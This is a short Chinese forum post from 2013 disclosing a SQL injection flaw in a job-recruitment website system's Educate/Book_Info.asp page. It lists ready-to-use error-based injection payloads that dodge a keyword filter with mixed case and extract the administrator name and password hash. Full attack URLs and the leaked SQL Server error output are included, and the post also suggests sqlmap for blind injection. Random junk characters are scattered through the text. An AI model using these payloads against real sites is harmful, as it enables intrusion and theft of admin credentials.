标题: 网络求职招聘人才网站系统正式版注入 [打印本页] 作者: admin 时间: 2013-2-16 21:44 标题: 网络求职招聘人才网站系统正式版注入 漏洞出现在Educate/Book_Info.asp . L& y' w2 p, |- b6 p! W* K7 ? 0 {) M' l' a$ A/ a+ Y. K4 O+ U! b此处注入点虽然过滤了一些关键字 但是我们还是可以盲注的 可以利用sqlmap跑出 ! P v& G& p0 O% e6 u2 Y * f# J9 B7 X- h- y1 C. N ~
exp:如下+ F( I; b5 _& i: N
查询管理账号:+aNd+0=(selEct+toP+1+su_SupperName+frOm+pH_Web_Supper)* {* h L7 n: W* W; Q
查询管理密码:+aNd+0=(selEct+toP+1+su_Password+frOm+pH_Web_Supper) - ~. {# n8 l {; o0 Z6 W, F : [' q: L4 b9 X* X4 ~1 | http://www.xxx.com /Educate/Book_Info.asp?Param=20+aNd+0=(selEct+toP+1+su_SupperName+frOm+pH_Web_Supper)' q. z4 b8 q; B
# H; R* d0 X) T, U1 a, v2 sMicrosoft OLE DB Provider for SQL Server 错误 '80040e07' + v6 V3 O' E; m ~9 z- t4 t % G+ ~# e; r+ M" T4 ?
将 nvarchar 值 'hackbase' 转换为数据类型为 int 的列时发生语法错误。9 p' q9 c$ M' C6 G4 n7 z
- s1 ?2 f$ Z. t2 c/Educate/Book_Info.asp,行 8 7 X" C; p/ o, S# |6 A ! M k2 a+ u. }9 A http://www.xxx.com /Educate/Book_Info.asp?Param=20+aNd+0=(selEct+toP+1+su_Password+frOm+pH_Web_Supper)7 Q5 B% y/ S1 x" B
& {* }, d2 E6 l/ b) x9 hMicrosoft OLE DB Provider for SQL Server 错误 '80040e07' G" d* S4 K5 p4 O" B* I$ P2 H8 G, D
! u: ], |3 _% l3 S% J" G* `
将 nvarchar 值 '165706AD8319D7F95B7FC5E82FBE8F' 转换为数据类型为 int 的列时发生语法错误。% E+ r$ T) [$ w6 P: u
$ O9 p) D3 j& d0 H- s
/Educate/Book_Info.asp,行 8! J8 B) l% S* A